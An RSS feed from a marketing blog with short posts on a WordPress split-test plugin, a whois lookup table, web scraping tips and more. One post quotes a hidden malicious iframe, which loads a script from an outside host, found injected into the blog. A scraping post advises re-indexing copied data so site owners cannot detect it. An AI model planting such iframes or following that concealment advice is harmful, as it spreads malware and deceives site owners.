<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Dellanave &#187; SEM</title>
	<atom:link href="http://www.dellanave.com/blog/category/sem/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.dellanave.com/blog</link>
	<description></description>
	<lastBuildDate>Tue, 29 Nov 2011 02:45:57 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.1.3</generator>
		<item>
		<title>How Not to Craft an Order Page</title>
		<link>http://www.dellanave.com/blog/2009/07/21/how-not-to-craft-an-order-page/</link>
		<comments>http://www.dellanave.com/blog/2009/07/21/how-not-to-craft-an-order-page/#comments</comments>
		<pubDate>Tue, 21 Jul 2009 20:17:34 +0000</pubDate>
		<dc:creator>david</dc:creator>
				<category><![CDATA[SEM]]></category>
		<category><![CDATA[Tech]]></category>

		<guid isPermaLink="false">http://www.dellanave.com/blog/?p=289</guid>
		<description><![CDATA[I am not a User Interface designer by any means, but when I was confronted with this order page I immediately popped a blood vessel in my brain and stalled on what to do next. If you have an e-commerce site, and your order page looks like this, STOP.  Do not do ONE MORE THING [...]]]></description>
			<content:encoded><![CDATA[<p>I am not a User Interface designer by any means, but when I was confronted with this order page I immediately popped a blood vessel in my brain and stalled on what to do next.</p>
<p>If you have an e-commerce site, and your order page looks like this, STOP.  Do not do ONE MORE THING until you fix it.</p>
<p>Click to see a bigger version:</p>
<p><a href="http://www.dellanave.com/skitch//Tower_Hobbies_Express_Checkout-20090721-151718.jpg"><img src="http://www.dellanave.com/skitch//Tower_Hobbies_Express_Checkout-20090721-151609.jpg"></a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.dellanave.com/blog/2009/07/21/how-not-to-craft-an-order-page/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How to Split Test Your WordPress Theme (w/ Plugin)</title>
		<link>http://www.dellanave.com/blog/2009/07/15/how-to-split-test-your-wordpress-theme-w-plugin/</link>
		<comments>http://www.dellanave.com/blog/2009/07/15/how-to-split-test-your-wordpress-theme-w-plugin/#comments</comments>
		<pubDate>Wed, 15 Jul 2009 21:12:35 +0000</pubDate>
		<dc:creator>david</dc:creator>
				<category><![CDATA[Blog]]></category>
		<category><![CDATA[Code]]></category>
		<category><![CDATA[Haxor]]></category>
		<category><![CDATA[SEM]]></category>
		<category><![CDATA[SEO]]></category>

		<guid isPermaLink="false">http://www.dellanave.com/blog/?p=271</guid>
		<description><![CDATA[Here is a rudimentary solution that allows you to split test all metrics on your WordPress blog.  If there is legitimate usage of this, I will make changes and improvements but at this point I am just throwing together a 15 minute SOLUTION not a complete idiot-proof package.  Please, give me feedback, I appreciate it.  [...]]]></description>
			<content:encoded><![CDATA[<p>Here is a rudimentary solution that allows you to split test all metrics on your WordPress blog.  If there is legitimate usage of this, I will make changes and improvements but at this point I am just throwing together a 15 minute SOLUTION not a complete idiot-proof package.  Please, give me feedback, I appreciate it.  This was created in response to <a href="http://www.cindyalvarez.com/data-driven/how-to-ab-test-your-wordpress-blog">this</a>, so you can go there to read about why Google Website Optimizer is not the right solution for testing metrics across an entire site.</p>
<p><a title="Split Test WordPress Plugin" href="http://www.dellanave.com/blog/ddn_wp_splittest-0.2.zip ">Download plugin.</a></p>
<p>First thing you need to do is create 2 theme folders.</p>
<p>theme1 is your original theme</p>
<p>theme2 contains the same theme, but with the changes you want to test</p>
<p>Set up 2 Google Analytics accounts.  This seems easiest to do with 2 different email addresses, and 2 browsers so that you can load both at the same time, and it doesn&#8217;t complain about the URL being the same.</p>
<ol>
<li>Open theme1/footer.php and insert the GA code from one account into the footer before the &lt;/body&gt; tag.</li>
<li>Open theme2/footer.php and insert the GA code from one account into the footer before the &lt;/body&gt; tag.</li>
</ol>
<p>That&#8217;s about it.  The plugin will drop a cookie on the user telling them which theme file to load.  If you want to completely change the themes, you can edit the plugin and change the cookie name to something new.  The cookie lasts for 30 days by default.</p>
<p><strong>PS. </strong>I&#8217;m gonna admit right now that I almost always make mistakes the first time around.  If this doesn&#8217;t work for you &#8211; let me know.  If this doesn&#8217;t work for you and you figure out why &#8211; PLEASE hit me up and let me know so I can update this post.</p>
<p><strong>P.P.S</strong> This could be pretty easily made so much better, easier to install, easier to use, and more flexible.  We&#8217;ll see if the demand warrants it.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.dellanave.com/blog/2009/07/15/how-to-split-test-your-wordpress-theme-w-plugin/feed/</wfw:commentRss>
		<slash:comments>9</slash:comments>
		</item>
		<item>
		<title>How to Get Rich Online</title>
		<link>http://www.dellanave.com/blog/2009/05/04/how-to-get-rich-online/</link>
		<comments>http://www.dellanave.com/blog/2009/05/04/how-to-get-rich-online/#comments</comments>
		<pubDate>Mon, 04 May 2009 15:23:47 +0000</pubDate>
		<dc:creator>david</dc:creator>
				<category><![CDATA[SEM]]></category>

		<guid isPermaLink="false">http://www.dellanave.com/blog/?p=231</guid>
		<description><![CDATA[Everyone wants a guide to get rich online. Here is a 5-step guide, with approximately how much time you should spend on each. 1. Pick a topic or niche and create a site about it. It doesn&#8217;t matter what it is. &#8211; 1% 2. Create a little bit of content. &#8211; 5% 3. Use twitter, [...]]]></description>
			<content:encoded><![CDATA[<p>Everyone wants a guide to get rich online.  Here is a 5-step guide, with approximately how much time you should spend on each.</p>
<ul>
<li>1. Pick a topic or niche and create a site about it.  It doesn&#8217;t matter what it is. &#8211; 1%</li>
<li>2. Create a little bit of content. &#8211; 5%</li>
<li>3. Use twitter, forums, link building, email and the telephone to connect with and build your community one user at a time.  &#8211; 90%</li>
<li>4. Create a little more content, and leverage your community that you have built to create more. &#8211; 4%</li>
<li>5. Get rich.</li>
<p>You can thank me later.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.dellanave.com/blog/2009/05/04/how-to-get-rich-online/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Prevent, Protract, Process</title>
		<link>http://www.dellanave.com/blog/2009/01/28/prevent-protract-process/</link>
		<comments>http://www.dellanave.com/blog/2009/01/28/prevent-protract-process/#comments</comments>
		<pubDate>Wed, 28 Jan 2009 19:40:35 +0000</pubDate>
		<dc:creator>david</dc:creator>
				<category><![CDATA[Awesome]]></category>
		<category><![CDATA[SEM]]></category>

		<guid isPermaLink="false">http://www.dellanave.com/blog/?p=196</guid>
		<description><![CDATA[I did a Google search for &#8220;chargeback guardian&#8221; the other day, and here&#8217;s what I saw: The irony of those title tags is beautiful. In case you don&#8217;t get it&#8230; Charge Back Guardian is a company that processes credit card payments and helps to prevent chargebacks. Presumably if you&#8217;re selling an iffy product you&#8217;d want [...]]]></description>
			<content:encoded><![CDATA[<p>I did a Google search for &#8220;chargeback guardian&#8221; the other day, and here&#8217;s what I saw:</p>
<p><img src="http://www.dellanave.com/skitch//ChargeBack_Guardian_-_Google_Search-20090128-133746.jpg"></p>
<p>The irony of those title tags is beautiful.  In case you don&#8217;t get it&#8230;</p>
<p>Charge Back Guardian is a company that processes credit card payments and helps to prevent chargebacks.  Presumably if you&#8217;re selling an iffy product you&#8217;d want to use these guys.  I have no problem with that.  But that they have &#8220;Protract&#8221; as a mis-spelling in their title all too appropriate.</p>
<p>My guess is you wouldn&#8217;t want to get into a <i>protracted</i> battle with these guys to get your money back.</p>
<p>Oh, and the title on their main page is still misspelled, Protrect.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.dellanave.com/blog/2009/01/28/prevent-protract-process/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Semi-Comprehensive TLD Whois Response List</title>
		<link>http://www.dellanave.com/blog/2008/07/23/semi-comprehensive-tld-whois-response-list/</link>
		<comments>http://www.dellanave.com/blog/2008/07/23/semi-comprehensive-tld-whois-response-list/#comments</comments>
		<pubDate>Wed, 23 Jul 2008 17:50:58 +0000</pubDate>
		<dc:creator>david</dc:creator>
				<category><![CDATA[Code]]></category>
		<category><![CDATA[SEM]]></category>
		<category><![CDATA[SEO]]></category>
		<category><![CDATA[Tech]]></category>

		<guid isPermaLink="false">http://www.dellanave.com/blog/?p=158</guid>
		<description><![CDATA[For one of the coolest features of our Tools project I needed to be able to accurately determine domain availability. Here&#8217;s what I came up with: $domain_ext = array( &#8216;.com&#8217; => array(&#8216;whois.crsnic.net&#8217;,'No match for&#8217;), &#8216;.net&#8217; => array(&#8216;whois.crsnic.net&#8217;,'No match for&#8217;), &#8216;.biz&#8217; => array(&#8216;whois.biz&#8217;,'Not found&#8217;), &#8216;.mobi&#8217; => array(&#8216;whois.dotmobiregistry.net&#8217;, &#8216;NOT FOUND&#8217;), &#8216;.tv&#8217; => array(&#8216;whois.nic.tv&#8217;, &#8216;No match for&#8217;), &#8216;.in&#8217; [...]]]></description>
			<content:encoded><![CDATA[<p>For one of the coolest features of our <a href="http://tools.shoemoney.com/">Tools</a> project I needed to be able to accurately determine domain availability.  Here&#8217;s what I came up with:</p>
<p>$domain_ext = array(<br />
        &#8216;.com&#8217;          => array(&#8216;whois.crsnic.net&#8217;,'No match for&#8217;),<br />
        &#8216;.net&#8217;          => array(&#8216;whois.crsnic.net&#8217;,'No match for&#8217;),<br />
        &#8216;.biz&#8217;          => array(&#8216;whois.biz&#8217;,'Not found&#8217;),<br />
        &#8216;.mobi&#8217;         => array(&#8216;whois.dotmobiregistry.net&#8217;, &#8216;NOT FOUND&#8217;),<br />
        &#8216;.tv&#8217;           => array(&#8216;whois.nic.tv&#8217;, &#8216;No match for&#8217;),<br />
        &#8216;.in&#8217;           => array(&#8216;whois.inregistry.net&#8217;, &#8216;NOT FOUND&#8217;),<br />
        &#8216;.info&#8217;         => array(&#8216;whois.afilias.net&#8217;,'NOT FOUND&#8217;),<br />
        &#8216;.co.uk&#8217;        => array(&#8216;whois.nic.uk&#8217;,'No match&#8217;),<br />
        &#8216;.co.ug&#8217;        => array(&#8216;wawa.eahd.or.ug&#8217;,'No entries found&#8217;),<br />
        &#8216;.or.ug&#8217;        => array(&#8216;wawa.eahd.or.ug&#8217;,'No entries found&#8217;),<br />
        &#8216;.nl&#8217;           => array(&#8216;whois.domain-registry.nl&#8217;,'is free&#8217;),<br />
        &#8216;.ro&#8217;           => array(&#8216;whois.rotld.ro&#8217;,'No entries found for the selected&#8217;),<br />
        &#8216;.com.au&#8217;       => array(&#8216;whois.ausregistry.net.au&#8217;,'No Data Found&#8217;),<br />
        &#8216;.ca&#8217;           => array(&#8216;whois.cira.ca&#8217;, &#8216;AVAIL&#8217;),<br />
        &#8216;.org.uk&#8217;       => array(&#8216;whois.nic.uk&#8217;,'No match&#8217;),<br />
        &#8216;.name&#8217;         => array(&#8216;whois.nic.name&#8217;,'No match&#8217;),<br />
        &#8216;.us&#8217;           => array(&#8216;whois.nic.us&#8217;,'Not found&#8217;),<br />
        &#8216;.ac.ug&#8217;        => array(&#8216;wawa.eahd.or.ug&#8217;,'No entries found&#8217;),<br />
        &#8216;.ne.ug&#8217;        => array(&#8216;wawa.eahd.or.ug&#8217;,'No entries found&#8217;),<br />
        &#8216;.sc.ug&#8217;        => array(&#8216;wawa.eahd.or.ug&#8217;,'No entries found&#8217;),<br />
        &#8216;.ws&#8217;           => array(&#8216;whois.website.ws&#8217;,'No Match&#8217;),<br />
        &#8216;.be&#8217;           => array(&#8216;whois.ripe.net&#8217;,'FREE&#8217;),<br />
        &#8216;.com.cn&#8217;       => array(&#8216;whois.cnnic.cn&#8217;,'no matching record&#8217;),<br />
        &#8216;.net.cn&#8217;       => array(&#8216;whois.cnnic.cn&#8217;,'no matching record&#8217;),<br />
        &#8216;.org.cn&#8217;       => array(&#8216;whois.cnnic.cn&#8217;,'no matching record&#8217;),<br />
        &#8216;.no&#8217;           => array(&#8216;whois.norid.no&#8217;,'no matches&#8217;),<br />
        &#8216;.se&#8217;           => array(&#8216;whois.nic-se.se&#8217;,'not found&#8217;),<br />
        &#8216;.nu&#8217;           => array(&#8216;whois.nic.nu&#8217;,'NO MATCH for&#8217;),<br />
        &#8216;.com.tw&#8217;       => array(&#8216;whois.twnic.net&#8217;,'No Found&#8217;),<br />
        &#8216;.net.tw&#8217;       => array(&#8216;whois.twnic.net&#8217;,'No Found&#8217;),<br />
        &#8216;.org.tw&#8217;       => array(&#8216;whois.twnic.net&#8217;,'No Found&#8217;),<br />
        &#8216;.cc&#8217;           => array(&#8216;whois.nic.cc&#8217;,'No match&#8217;),<br />
        &#8216;.nl&#8217;           => array(&#8216;whois.domain-registry.nl&#8217;,'is free&#8217;),<br />
        &#8216;.pl&#8217;           => array(&#8216;whois.dns.pl&#8217;,'No information about&#8217;),<br />
        &#8216;.pt&#8217;           => array(&#8216;whois.dns.pt&#8217;,'no match&#8217;),<br />
        &#8216;.org&#8217;          => array(&#8216;whois.pir.org&#8217;,'NOT FOUND&#8217;)<br />
);</p>
<p>If I had time, I&#8217;d add a 3rd field which would be the response when the domain IS available.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.dellanave.com/blog/2008/07/23/semi-comprehensive-tld-whois-response-list/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Soft Launch of Fighters.com, Finally</title>
		<link>http://www.dellanave.com/blog/2008/04/02/soft-launch-of-fighterscom-finally/</link>
		<comments>http://www.dellanave.com/blog/2008/04/02/soft-launch-of-fighterscom-finally/#comments</comments>
		<pubDate>Wed, 02 Apr 2008 15:58:10 +0000</pubDate>
		<dc:creator>david</dc:creator>
				<category><![CDATA[News]]></category>
		<category><![CDATA[SEM]]></category>

		<guid isPermaLink="false">http://www.dellanave.com/blog/2008/04/02/soft-launch-of-fighterscom-finally/</guid>
		<description><![CDATA[It has been a long time in coming, but we&#8217;ve finally been able soft-launch Fighters.com. The site is pretty web-1.0 right now and most of the content is site->user, but that will change soon. Check it out, let me know what you think. I know there will be bugs, but if you&#8217;re waiting to find [...]]]></description>
			<content:encoded><![CDATA[<p>It has been a long time in coming, but we&#8217;ve finally been able soft-launch <a href="http://www.fighters.com/">Fighters.com</a>.  The site is pretty web-1.0 right now and most of the content is site->user, but that will change soon.</p>
<p>Check it out, let me know what you think.  I know there will be bugs, but if you&#8217;re waiting to find the last bug you&#8217;ll never launch.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.dellanave.com/blog/2008/04/02/soft-launch-of-fighterscom-finally/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Nice Exploit Code I Found in my WordPress</title>
		<link>http://www.dellanave.com/blog/2008/03/10/nice-exploit-code-i-found-in-my-wordpress/</link>
		<comments>http://www.dellanave.com/blog/2008/03/10/nice-exploit-code-i-found-in-my-wordpress/#comments</comments>
		<pubDate>Mon, 10 Mar 2008 17:51:53 +0000</pubDate>
		<dc:creator>david</dc:creator>
				<category><![CDATA[Blog]]></category>
		<category><![CDATA[Code]]></category>
		<category><![CDATA[SEM]]></category>
		<category><![CDATA[SEO]]></category>
		<category><![CDATA[Tech]]></category>

		<guid isPermaLink="false">http://www.dellanave.com/blog/2008/03/10/nice-exploit-code-i-found-in-my-wordpress/</guid>
		<description><![CDATA[I was going through some old posts just now, and discovered this little treat embedded in a post: &#60;!-- Traffic Statistics --&#62; &#60;iframe src=http://www.wp-stats-php.info/iframe/wp-stats.php width=1 height=1 frameborder=0&#62;&#60;/iframe&#62; &#60;!-- End Traffic Statistics --&#62; The code that it&#8217;s loading (I know it doesn&#8217;t wrap, I don&#8217;t really care.) Code deleted. Thanks to Mike Peters for the follow-up [...]]]></description>
			<content:encoded><![CDATA[<p>I was going through some old posts just now, and discovered this little treat embedded in a post:</p>
<blockquote><p><code></p>
<pre>
&lt;!-- Traffic Statistics --&gt;
&lt;iframe src=http://www.wp-stats-php.info/iframe/wp-stats.php width=1 height=1 frameborder=0&gt;&lt;/iframe&gt;
&lt;!-- End Traffic Statistics --&gt;
</pre>
<p></code></p></blockquote>
<p>The code that it&#8217;s loading (I know it doesn&#8217;t wrap, I don&#8217;t really care.)  Code deleted.  Thanks to <a href="http://www.softwareprojects.com/resources">Mike Peters</a> for the follow-up in the comments:</p>
<blockquote><p>
This code got sql injected into your wp_posts.</p>
<p>Make sure you upgrade to the 2.3.2 version of WordPress:</p>
<p>http://wordpress.org/support/topic/151888</p>
<p>What it does is attempt to install a VBS malware on your machine using an xmlrpc exploit in older versions of WordPress.</p>
<p>Look for something like this in your server logs -</p>
<p>200.216.67.181 &#8211; - [28/Jan/2008:13:10:54 -0500] “POST /xmlrpc.php HTTP/1.0″</p>
<p>Once you view the post, you’re infected &#8211; the VBS code will be installed and you’re going to need to run NOD32 or AVG to clean it up</p>
</blockquote>
<p>Someone with more patience than myself will probably take the time to disassemble that.</p>
<p>To find the post titles in your blog that might be affected, in SQL do:</p>
<blockquote><p><code><br />
mysql> select post_title from wp_posts where post_content like '%Statistics%';<br />
</code></p></blockquote>
]]></content:encoded>
			<wfw:commentRss>http://www.dellanave.com/blog/2008/03/10/nice-exploit-code-i-found-in-my-wordpress/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>AdCenter Still Sucks</title>
		<link>http://www.dellanave.com/blog/2008/03/06/adcenter-still-sucks/</link>
		<comments>http://www.dellanave.com/blog/2008/03/06/adcenter-still-sucks/#comments</comments>
		<pubDate>Thu, 06 Mar 2008 17:55:44 +0000</pubDate>
		<dc:creator>david</dc:creator>
				<category><![CDATA[SEM]]></category>
		<category><![CDATA[Tech]]></category>

		<guid isPermaLink="false">http://www.dellanave.com/blog/2008/03/06/adcenter-still-sucks/</guid>
		<description><![CDATA[I haven&#8217;t had an active campaign running in 6 months or more. FIX YOUR SHIT.]]></description>
			<content:encoded><![CDATA[<p><img src="http://www.dellanave.com/skitch/adcenter_still_sucks-20080306-115445.jpg"></p>
<p>I haven&#8217;t had an active campaign running in 6 months or more.  FIX YOUR SHIT.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.dellanave.com/blog/2008/03/06/adcenter-still-sucks/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>How much would you pay to use Google?</title>
		<link>http://www.dellanave.com/blog/2008/01/29/how-much-would-you-pay-to-use-google/</link>
		<comments>http://www.dellanave.com/blog/2008/01/29/how-much-would-you-pay-to-use-google/#comments</comments>
		<pubDate>Tue, 29 Jan 2008 07:26:36 +0000</pubDate>
		<dc:creator>david</dc:creator>
				<category><![CDATA[Google]]></category>
		<category><![CDATA[Opinion]]></category>
		<category><![CDATA[SEM]]></category>
		<category><![CDATA[SEO]]></category>
		<category><![CDATA[Tech]]></category>

		<guid isPermaLink="false">http://www.dellanave.com/blog/2008/01/29/how-much-would-you-pay-to-use-google/</guid>
		<description><![CDATA[I got to thinking about how much I use Google to answer questions the other day. My search activity calendar looks like this every month: Even between Jan 1-3 when I was in Vegas I did 1-3 searches. Some months are even more heavy than this. So how much would I pay? I wouldn&#8217;t have [...]]]></description>
			<content:encoded><![CDATA[<p>I got to thinking about how much I use Google to answer questions the other day.  My search activity calendar looks like this every month:</p>
<p><center><br />
<img src="http://www.dellanave.com/skitch/Google_-_Web_History-20080129-012131.jpg"><br />
</center></p>
<p>Even between Jan 1-3 when I was in Vegas I did 1-3 searches.  Some months are even more heavy than this.  So how much would I pay?  I wouldn&#8217;t have a problem with paying up to $1500/year to use Google.  Maybe even more if I had to.  It is THAT valuable to me.</p>
<p>How much would you pay to use Google?</p>
<p>P.S.  I think the search history is super freakin&#8217; cool.</p>
<blockquote><p><b>Update:</b> <a href="http://www.thatpamchick.com/2008/01/30/google-web-activity-calendar/">Pam</a> points out that the calendar is actually all web activity and not just search.  Touché.  That said, it doesn&#8217;t change how valuable I think Google is to me.  I&#8217;d still cough up the $1500.</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.dellanave.com/blog/2008/01/29/how-much-would-you-pay-to-use-google/feed/</wfw:commentRss>
		<slash:comments>11</slash:comments>
		</item>
		<item>
		<title>Tips on Writing a Scraper</title>
		<link>http://www.dellanave.com/blog/2008/01/11/tips-on-writing-a-scraper/</link>
		<comments>http://www.dellanave.com/blog/2008/01/11/tips-on-writing-a-scraper/#comments</comments>
		<pubDate>Fri, 11 Jan 2008 19:23:29 +0000</pubDate>
		<dc:creator>david</dc:creator>
				<category><![CDATA[Haxor]]></category>
		<category><![CDATA[SEM]]></category>
		<category><![CDATA[SEO]]></category>
		<category><![CDATA[Tech]]></category>

		<guid isPermaLink="false">http://www.dellanave.com/blog/2008/01/11/tips-on-writing-a-scraper/</guid>
		<description><![CDATA[A couple weeks ago I got an email from a friend asking for some tips on writing a scraper. As I was responding, I realized it would make a good post. I think writing scrapers is one of my specialties, and I&#8217;ve yet to come across a site I haven&#8217;t been able to pillage. Here&#8217;s [...]]]></description>
			<content:encoded><![CDATA[<p>A couple weeks ago I got an email from a friend asking for some tips on writing a scraper.  As I was responding, I realized it would make a good post.   I think writing scrapers is one of my specialties, and I&#8217;ve yet to come across a site I haven&#8217;t been able to pillage.</p>
<p>Here&#8217;s a few thoughts:</p>
<p>I like Perl a lot for scraping, but PHP works too.  Since scraping is kind of a rapid-prototype situation you should just use the tool you&#8217;re most comfortable with.  The nice part about Perl for scraping is all the available modules to do various data mangling, and the ability to multi-thread it.  I rarely write a scraper in PHP, but if you&#8217;re more comfortable with PHP by all means USE IT.</p>
<p>Scrape ALL THE DATA YOU CAN.  You might think you only want one little bit of data from a site.  Take everything you can and dump it into a database.  Look, you&#8217;re pulling the page anyway, you might as well save everything in case you need it later.  Dump everything into a database, and then pull out what you want from there into whatever you&#8217;re using it for.  You&#8217;ll never regret having the full dump, but you will regret not grabbing everything when you need another bit of data and you didn&#8217;t scrape it.</p>
<p>Be smart about re-indexing it.  Say you scrape somesite.com/id=123.  Don&#8217;t put it into your database with id=123.  Some day the site owner you ripped is going to notice all the IDs are the same and could use that against you.  Re-index it.  Going back to my previous point, keep THEIR ids in a database in case you need to rip some more data, you have their keys intact.</p>
<p>A lot of people worry about rotating or proxying IPs when they&#8217;re scraping.  Don&#8217;t waste your time.  I&#8217;ve yet to find a site (other than Google) that will actually be aware enough to block you for scraping.  In the same vein, don&#8217;t piss-pound someone&#8217;s server when you&#8217;re scraping them.  Put a sleep(1) in for christs sake.</p>
<p>Distributing your scraper?  That might make sense if you&#8217;re planning on spidering or scraping a lot of sites.  Use a common database and make sure your scrapers never cross paths.  Its a waste of your resources as well as the site you&#8217;re pillaging.</p>
<p>Don&#8217;t overthink or overcode it.  This is like anything else.  I&#8217;ve literally seen people spend a week writing a scraper with a million bells and whistles.  Just make it WORK and run it.</p>
<p>Be aware of cookies.  Sometimes you&#8217;ll want your scraper to happily accept cookies, other times you want to make sure it ignores them.  Depends on the site you&#8217;re scraping.  Be aware that some sites will have interstitials or other things that will mess with your scrape.  Cookies may or may not be away around those ads.  Regardless, be aware of them and code accordingly.</p>
<p>Use Live HTTP Headers in Firefox if you&#8217;re struggling with understanding why you can access a site in a browser but your Perl script doesn&#8217;t get the same responses.</p>
<p>Don&#8217;t forget APIs.  Sometimes you don&#8217;t even need to scrape, you can pull the data with an API.  One time I wanted a database of like every CD ever made.  Amazon API for the win.</p>
<p>Finally, remember, if a browser can access it, you can scrape it.  If you can&#8217;t figure it out, you&#8217;re not trying hard enough.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.dellanave.com/blog/2008/01/11/tips-on-writing-a-scraper/feed/</wfw:commentRss>
		<slash:comments>7</slash:comments>
		</item>
	</channel>
</rss>

